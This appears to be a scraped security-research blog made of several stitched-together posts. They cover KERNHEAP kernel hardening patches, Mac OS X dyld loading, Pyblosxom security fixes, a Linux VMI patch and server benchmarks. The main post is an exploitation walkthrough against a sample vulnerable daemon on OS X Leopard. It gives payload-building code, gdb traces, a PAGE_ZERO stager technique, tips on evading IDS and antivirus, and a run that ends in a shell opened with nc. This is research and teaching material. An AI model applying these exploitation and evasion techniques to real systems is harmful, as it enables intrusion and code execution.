Apparently there's been a increased interest on bringing Linux kernel security issues to attention, for the past few months. It is a natural reaction to a policy which has been long time tacitly agreed upon by mostly all people involved in Linux kernel development (and more so, those with security-relevant roles, particularly a specific vendor). That is, a policy of silence. It is no surprise that Linux security currently looks much better on paper and marketing propaganda than it does in reality.
It takes decent amounts of will and dedication to summarize, categorize and review every potential security vulnerability for such a huge project, requiring collaboration between different vendors, who might or might not have agendas of their own, conflicting the interests of the users, or the rest of vendors themselves. It takes approximately ten minutes for an average computer user to write a summary of why SELinux can help your organization cut down security risks.
What you don't now is that you will have to go through the learning curve of writing policies, reviewing all software being used (including commercial applications which might not conflict with any 'learning' mode at kernel level, but consistently prevent targeted reverse engineering or make it even more tiresome), testing the setup and adapting its architecture to the real needs of your organization. MLS is rarely used out of certain circles.
Without further ado, KERNHEAP is available at http://www.subreption.com/kernheap as patches applicable to the latest stable 2.6 Linux kernel revision.
What's new?
The page sanitization functionality has been removed, in favor of using KERNHEAP along PaX, which provides a (unconditional) memory sanitization feature. In the near future, a SLAB flag might be added to support allocation-level sanitization.
The vmalloc vmap structures are now stored in an isolated cache, instead of a generic kmalloc cache. This helps to avoid certain cases in which a SLAB buffer overflow scenario could corrupt a neighboring vmap area structure, leading to potentially exploitable conditions during list walking in the vmap routines, where checks have been implemented to validate pointer correctness.
Full support against double frees and other types of heap corruption has been implemented for SLAB, SLUB and SLOB (the latter currently with limited functionality, users of SLOB would be better off moving to SLAB). Cache and slab meta-data is protected as well.
Currently only x86 and UML have been tested (you can protect User-Mode Linux kernels with KERNHEAP seamlessly).
Poisoning and the "pit" area
This change affects architectures with a fixmap, currently x86 and User-Mode Linux (UML) have been tested (the latter lacks a fixmap implementation). Poisoning alone is architecture-independent.
Every cache contains two unsigned long values, for poisoning uninitialized and free objects. If the architecture supports a fixmap, these values are randomized within a range, pointing to a reserved top memory location (a "mapping" within the fixmap). The page fault handler is modified to include a special case to handle accesses to this region. This allows us to reliably detect use of uninitialized or already released objects, as well as poisoning other pointer values (such as list nodes after unlinking).
This region is referred to (in KERNHEAP source code and documentation) as "the pit".
Architectures without fixmap support are unsupported, and will require editing the patch to avoid using fixmap-based poison address values. This would be done in the same way UML support is written, it is a simple change.
SAFELIST
KERNHEAP now provides more than mere safe unlinking. List nodes have their pointers poisoned after unlinking and the correctness of the nodes is verified during certain core operations. This provides robust protection against most forms of corruption in all linked lists. In the near future, protection for other similar interfaces might be implemented.
KERNHEAP and PaX or grsecurity
We recommend using PaX and KERNHEAP together, since PaX features can benefit from the meta-data corruption protections (among other things, for example for USERCOPY) and KERNHEAP itself can benefit from KERNEXEC and other protections to deter kernel exploitation. The patches shouldn't conflict with each other, but any potential conflict can be easily solved, either manually or through a "pax-compat" patch available in the distribution site.
Support and sponsoring
At the moment, KERNHEAP is developed by Subreption LLC. We do not offer support to organizations and individuals, apart of bug fixes, maintaining up to date patches and developing new features as we see fit. If you are interested on custom solutions or support for your organization related with KERNHEAP, or you are interested on sponsoring its development, contact us.
An article written by Dan Goodin from The Register was recently published, it
mentions a forthcoming presentation by Vincenzo Iozzo, which presents a method
to load a binary on runtime, directly from memory, in Mac OS X systems.
Here we like to stick to the technical side of things... so let's get started
on explaining how this can be done, in case you aren't planning to attend Black Hat or
just feel particularly curious on the topic!
The Mach-o Dynamic Loader: Dyld and runtime binary loading
When you execute a program, the operating system processes its main binary
("the executable") and resolves its dependencies before execution begins. Modern
operating systems allow programs to depend on other software dynamically. Instead
of compiling all the features statically (that is, built-in in the main executable),
it lets you select such dependencies dynamically. When the executable is loaded,
a piece of software takes care of finding such dependencies, placing them in
memory, and updating the locations where our program will find the necessary
functions, et cetera. This provides an efficient way to save space and produce
less bulky binaries, as well as easing updates, since a library can be upgraded
while retaining backwards compatibility.
The good fellows at Apple designed an even more efficient procedure for loading
common libraries, and some of them stay on memory after the system boots, providing
faster loading times and better execution speed, while lowering the stress on the disk
caused by repeatedly loading libraries when executing a new process. The place
where such common libraries are loaded is the shared region. It's been used to
produce 100% reliable local privilege escalation exploits, too.
In Mac OS X, the dynamic linker
is known as dyld. Leopard implements
a rudimentary form of ASLR, consistent enough to deter the most simple threats and
inefficient against some other issues (heap overflows, memory leaks and so forth).
The dyld happens to be loaded on a static address in every Leopard installation,
independently of language, distribution (that means Server) or platform.
Given a couple thousand different Intel-based 32-bit Leopard installations, dyld
will live at 0x8fe00000, for all of them.
We've been waiting for a rather long time to hear back from the current
maintainer of Pyblosxom, the
Python blogging software running this blog.
He's probably busy or taking some time off, therefore we are releasing some
patches for a few minor security issues. It's a mere cross site-scripting bug,
likely the most annoying, common and rather stupid security issue in
web applications. In any case, you most likely want this fixed!
Also another potential directory traversal issue is fixed by applying these patches.
If you are using Pyblosxom to power your blog, please feel free to review these
patches and apply them to your code base if required.
This blog uses a slightly modified version of the original source code, with
certain improvements for performance and aesthetics. In the future we might
contribute our modifications to the upstream development tree.
Several software vendors realized, sometime during the 1990-2000 timeframe,
that exporting system call tables within kernel address space was a bad idea.
This obviously doesn't mean anything to Red Hat and other GNU/Linux vendors
who are happily providing world readable System.map files. Not
like anybody needs them, though.
Then again, you have to face potential funniness of contradictory measures,
like Apple's own mistakes. This article won't talk about yet another bug
introduced by a Linux developer working at Red Hat (and later silently fixed
by another employee of the very same company), but an interesting issue with
Mac OS X 10.4 systems on PowerPC.
The temp_patch_ptrace() function: how to fix an issue and introduce a new one
Albeit the implementation of ptrace on Mac OS X is severely crippled,
they had time to add a nifty trick to prevent immediate debugging of certain
processes. Undocumented, it was obviously used only by Apple's own software, namely
iTunes and related applications. A private flag set by a process would disallow
future interaction with it via ptrace or other mechanisms, thus
causing the gdb debugger to fail when trying to attach to the target
process. A modern version of the good old trick first described publicly by Silvio
Cesare in one of his anti-debugging
articles.
Apple, possibly with the intention of helping anti-piracy software vendors (in
their quest to preserve all that is good and just in the software industry and
beyond) added a KPI
(Kernel Programming Interface) that let's a kernel extension patch the
ptrace system call. The sysent variable (the
BSD equivalent of the Linux syscall_table, holding pointers, arguments
and other data of the supported system calls) is not exported
in any Mac OS X system, as a measure to prevent abuse (for example, in rootkits
and other malware subverting kernel-land code).
Therefore, there's no absolutely reliable method to patch the system call table
without resorting to hacks (even though these can be extremely reliable, mostly
always they are tied to specific versions and or architectures). Hence, the existence
of temp_patch_ptrace. See the implementation of the function below:
Once again, the Linux kernel developers delight us with their always discreet (read: silent, no-advisory, no-warning policy) and wonderful patching practices. Sometime between 2.6.24 and 2.6.25 a patch from a Red Hat developer was committed into the Linux kernel git tree, implementing changes to the VMI interfaces hooking some functions dealing with the GDT and LDT.
diff --git a/arch/x86/kernel/vmi_32.c b/arch/x86/kernel/vmi_32.c
index 6ca515d..edfb09f 100644
--- a/arch/x86/kernel/vmi_32.c
+++ b/arch/x86/kernel/vmi_32.c
@@ -235,7 +235,7 @@ static void vmi_write_ldt_entry(struct desc_struct *dt, int entry,
const void *desc)
{
u32 *ldt_entry = (u32 *)desc;
- vmi_ops.write_idt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
+ vmi_ops.write_ldt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
}
static void vmi_load_sp0(struct tss_struct *tss,
It's not truly clear if there's a reliable way to abuse this issue properly (since
data passed to sys_modify_ldt goes through several checks and might not
trigger the vulnerable code path right away). Although, the original commit mentions
that it was discovered when JRE caused failures. In addition, vmi_ops.write_idt_entry
might do further validation, thus reducing the issue to a mere denial of service in
the worst case. Also, it affects only x86 VMI guests.
After some time without any updates coming up, this article will show some techniques and strategies to improve reliability of exploit code in Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (co-authored the book with Kevin Finisterre).
Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only they are identified by IDS vendors but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality in small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).
Caveats
When using a stager, you might find few different shortcomings that prevent your code from being reliable or effective against the most wide span of architectures and platforms:
- Requiring an allocation procedure. Usually unavoidable on kernel-land
exploit code, but workarounds exist in special circumstances. Using
malloc()or other allocators requires previous knowledge of their location within the address space. - Stages size and memory resilience: do you want your shellcode to be
eventually swapped to disk and remain up there for any future forensics?
Certainly not. Using
mlockis required. - Endianness and direction of stack (wherein most architectures it grows down, it doesn't in some, therefore subverting the previous frame might not be effective). If your data is transmitted from a remote stage-serving host, you want it to be translated to the endianness of the target stager listener.
The sample vulnerable daemon
vulnerabled is a (TCP based) network daemon which processes
incoming messages and seeks a callto:// handler. Then it reads
whatever is trailing after the handler string. Imagine this daemon is used
to connect to a VoIP solution that calls numbers provided by a crawler to
do phone spam or targeted advertisement.
The daemon properly reads the incoming message into a heap allocated buffer,
named tmpbuf. Its contents are zeroed every time the loop runs, therefore
making reliable usage of the buffer impossible on two consecutive runs if
tmpbuf points to the same address. A memory leak would help in
this situation, but there's none.
Afterwards, data is read from the incoming connection, into tmpbuf.
It NULL-terminates the buffer, but if tmpbuf address is overwritten,
a NULL byte will be written off-bounds. Such a situation could be useful in certain
cases, but we won't be looking into this particular possibility in depth for this
article; a single NULL byte write can indeed lead to arbitrary code execution, as
long as some requirements are met: here the offset will be equal to the length of
the data received from the client, thus we will need to send a payload of specific
length to match the offset (example: target address minus address of
tmpbuf) where we want our NULL to be injected.
22 char *tmpbuf = NULL;
23 char vulnbuf[265];
...
37 tmpbuf = malloc(8092);
...
74 while(1) {
...
91 memset(vulnbuf, 0, sizeof(vulnbuf));
...
96 if ((recvlen = recv(connfd, tmpbuf, 8092, 0)) != -1)
97 {
98 tmpbuf[recvlen] = '\0';
If the incoming data contains the handler string, it reads the trailing string
into the stack-based buffer named vulnbuf, which has a fixed size
of 265 bytes. A stack-based buffer overflow condition with a twist: we can abuse
variable ordering to do a more sophisticate attack against vulnerabled.
Instead of a single packet payload, we will dedicate one to send the main
payload and a second one to trigger it and subvert the execution flow in an elegant
manner. This will allow us to introduce the main topic of this article: creating
custom shellcode for evading security measures and improved reliability of stagers.
100 if ((recvlen > handlerlen) &&
101 (!memcmp(tmpbuf, DEFAULT_HANDLER, handlerlen)))
102 {
106 memcpy(vulnbuf, tmpbuf+handlerlen, recvlen-handlerlen);
107 fprintf(stdout, "received message: %s\n", vulnbuf);
108 }
109
110 if (recvlen > 4 && (tmpbuf[0] == '.') &&
111 (tmpbuf[1] == 'e') && (tmpbuf[2] == 'n') &&
112 (tmpbuf[3] == 'd'))
113 break;
The exploit approach
In the previous section we walked through the code of the sample vulnerable
daemon, reviewing the potentially exploitable security issues. Finally, we
suggested an elegant approach to abuse the issues for reliable code execution
against Apple Mac OS X Leopard 10.5.5. This section will explain said approach
thoroughly.
The layout of the attack is as follows:
- Initial payload:
- Handler string (
callto://) - Small NOP sled
- Custom
mprotect()and pre-stager shellcode - Stager shellcode
- Instructions to return or exit gracefully
- Random alphanumeric padding
- Address to EBP
- Second "trigger" payload:
- Handler string (
callto://) - End control message (
.end) - Address to write at EBP+4 (saved EIP)
data += self.shellcode
data += self.random_string(265-len(self.shellcode))
data += self.random_string(4)
data += self.random_string(4)
data += struct.pack('<L', ebp_address)
heap_jumper = ''
heap_jumper += '.end'
heap_jumper += struct.pack('<L', 0x80000c)
You might have noticed that writing to EBP for overwriting saved EIP
requires us to write 4 bytes preceding the new EIP value. The length
of the end control message is... exactly 4 bytes. And that's the condition
that let's us abuse the variable ordering to point tmpbuf at
EBP directly and overwrite saved EIP correctly. The final payload is
copied by recv into EBP:
(gdb) p $ebp $32 = (void *) 0xbffff888 (gdb) p tmpbuf $33 = 0xbffff888 ".end\f" (gdb) x/2x tmpbuf 0xbffff888: 0x646e652e 0x0080000c (gdb) x/i 0x0080000c 0x80000c: nop (gdb) p recvlen $34 = 8
Note the address pointing to the heap buffer which was allocated initially.
Mac OS X has an absolutely predictable heap, fortunately for us, unfortunate
for the end-user security. We have effectively overwritten a pointer address
to force the next recv call to write arbitrary data on EBP.
(gdb) c Continuing. vulnerabled(1654) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed *** set a breakpoint in malloc_error_break to debug Program received signal SIGTRAP, Trace/breakpoint trap. 0x0080002b in ?? () (gdb) x/4i $eip 0x80002b: xor %eax,%eax 0x80002d: push %eax 0x80002e: push %eax 0x80002f: push $0x1012 (gdb) i f Stack level 0, frame at 0xbffff888: eip = 0x80002b; saved eip 0xbf800000 called by frame at 0x800032 Arglist at 0xbffff880, args: Locals at 0xbffff880, Previous frame's sp is 0xbffff888 Saved registers: ebp at 0xbffff880, eip at 0xbffff884
There's a catch: if the binary has been compiled with IBM Stack Smashing Protector (SSP, in the past, known as ProPolice) the arrangement of variables on memory will be different and we won't be able to reach the pointer from the stack-based buffer, thus rendering this approach impossible.
Custom shellcode, stagers and non-executable stack
The custom shellcode explained here will use only a single
function from libSystem (the libc of sorts on OS X): mprotect.
It should be feasible to change memory protections using a different
method, but this is suitable for a re-spawning daemon since we can
bruteforce the dyld stub address.
It uses the mmap and mlock system calls, to
map memory at PAGE_ZERO (NULL, 0x00000000) and
lock pages to physical memory, respectively.
This is the first time that this technique appears (specifically for OS X)
publicly. The MACH-O binary format defines a zeroed, unmapped memory segment
at position 0, named PAGE_ZERO. It remains unmapped under normal circumstances
to force exceptions on NULL dereference conditions (read/write to NULL, offset
from NULL when reading a member of a structure pointing at NULL, etc).
If we map PAGE_ZERO and set its permissions to read-write-execute, we will have
space of PAGE_SIZE length (4096 bytes on x86) for storing shellcode stages
and pretty much anything we could find useful. Side-effects of mapping PAGE_ZERO
will be difficult to predict. Any future mistakes and programming errors
that dereference NULL or a offset from NULL won't raise an exception. Also,
if data is written there, our shellcode or data will be corrupted. Therefore,
for safety purposes, we might want to leave an initial set of bytes at NULL
unused (unchanged, thus zeroed). If data changes in the initial bytes, we
could raise an exception to emulate normal behavior, in case it's
been done as part of a test to detect our presence.
Mapping PAGE_ZERO will be clearly visible and it's not subtle if it remains in
mapped state for a long time. Apparently the dyld loader and other operations
during MACH-O execution time map the segment for a very short time.
The mprotect produces the following results when executed within
the context of vulnerabled after successful exploitation, before execution
of the stager shellcode:
Stack bf800000-bffff000 [ 8188K] rwx/rwx SM=PRV Stack bffff000-c0000000 [ 4K] rwx/rwx SM=COW thread 0 Stack [ 8192K]
And the mmap of PAGE_ZERO produces the following results (note the
initial unmapped state, and the different permissions afterwards, before the
final mprotect call):
Before mmap(): __PAGEZERO 00000000-00001000 [ 4K] ---/--- SM=NUL .../vulnerabled __PAGEZERO [ 4K] Before mprotect(): __PAGEZERO 00000000-00001000 [ 4K] rw-/rwx SM=NUL .../vulnerabled After mprotect(): __PAGEZERO 00000000-00001000 [ 4K] rwx/rwx SM=NUL .../vulnerabled
Now our stager shellcode will be able to write data received from the attacking host to a writable and executable region at a static address, without requiring allocation using non-static locations.
Conclusions
Developing custom shellcode is trivial in most situations, albeit testing can
be tiresome. Mac OS X lack of heap and mmap randomization is embarrassing,
and its layout has been repeatedly demonstrated to be easily predictable. Also, heap
memory permissions aren't enforced against execution (and read implies execute on Intel),
thus making heap a safe bet for storing our shellcode, and other data on runtime during
exploitation. ASLR in Leopard is incredibly weak, allowing trivial abuse of daemons
and applications re-spawning after an exception, and certain dyld ABI is still static.
Last but not least, lack of general memory permissions enforcement allows regions
to be made executable, thus defeating the whole purpose of both ASLR and NX on OS X.
$ python vulnerabled_exploit.py -s 127.0.0.1 -p 6888 [+] Target vulnerabled at 127.0.0.1:6888 ... [+] Running... [+] Finished (shellcode was 152 bytes, 290 total). [+] Check 127.0.0.1:6900 for shell. (gdb) r Starting program: ./vulnerabled Reading symbols for shared libraries ++. done Starting ./vulnerabled (pid: 2141, port: 6888)... connection from 127.0.0.1 tmpbuf=0x800000 vulnbuf=0xbffff74b esp=0xbffff6f0 it's a good message! (282 bytes, 273 in data) received message: ??????????1??R??? connection from 127.0.0.1 tmpbuf=0xbffff888 vulnbuf=0xbffff74b esp=0xbffff6f0 vulnerabled(2141) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed *** set a breakpoint in malloc_error_break to debug Program received signal SIGTRAP, Trace/breakpoint trap. 0x8fe01010 in __dyld__dyld_start () (gdb) c Continuing. Reading symbols for shared libraries .. done $ nc 127.0.0.1 6900 id uid=501(myuser) gid=20(staff) groups=20(staff),98(_lpadmin), ...
The .NET framework provides a Marshal class from its Runtime.InteropServices namespace which helps interfacing native and unmanaged data with managed code. The easy path for most of these cases is to simply use unsafe blocks and cast a pointer, but you end up losing references to allocated structures, leaking memory and likely leaving some funny exploitable condition in your unmanaged code bridge. Those pesky dangling pointers...
The function below calls an internal method to retrieve the list of loaded
kernel modules from userland. It depends on NtQuerySystemInformation()
and requires a heap-allocated structure array. Interfacing this with a C# managed
class will require another exported function to call HeapFree() and
release the allocated memory.
Using such an approach is certainly not recommended but it will cut you some hassle:
extern "C" __declspec(dllexport) PSYSTEM_MODULE_INFORMATION GetKernelModules(void)
{
HANDLE tmpHeap = GetProcessHeap();
PSYSTEM_MODULE_INFORMATION modList = NULL;
LoadFunctionPointers();
_getSysModules(&modList, tmpHeap);
return modList;
}
extern "C" __declspec(dllexport) void MyFreeHeap(LPVOID ptrToFree)
{
HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, ptrToFree);
}
Running our custom pyblosxom engine with mod_wsgi and Apache disk-based cache enabled is currently providing a performance of roughly 170 requests per second as of a measurement running 50 concurrent requests and a total of 1000 requests against the index page as of 6th September 2008.
There are some potential improvements and lighttpd or a similar high performance webserver could probably beat these numbers by a magnitude of a few thousand requests. We will be likely testing such a setup in the future. In our tests, lighttpd itself can handle around 1012.06 requests per second for a FastCGI served lightweight PHP script with no database backend usage.
Server Software: Apache
Server Hostname: blog.subreption.com
Server Port: 80
Document Path: /hub
Document Length: 24112 bytes
Concurrency Level: 50
Time taken for tests: 5.882 seconds
Complete requests: 1000
Failed requests: 0
Write errors: 0
Total transferred: 24289000 bytes
HTML transferred: 24112000 bytes
Requests per second: 170.02 [#/sec] (mean)
Time per request: 294.088 [ms] (mean)
Time per request: 5.882 [ms] (mean, across all concurrent requests)
Transfer rate: 4032.75 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median max
Connect: 0 0 0.2 0 1
Processing: 17 287 51.1 299 490
Waiting: 16 286 51.2 298 490
Total: 18 287 51.0 299 491
Percentage of the requests served within a certain time (ms)
50% 299
66% 313
75% 321
80% 325
90% 338
95% 351
98% 368
99% 375
100% 491 (longest request)
Recent Comments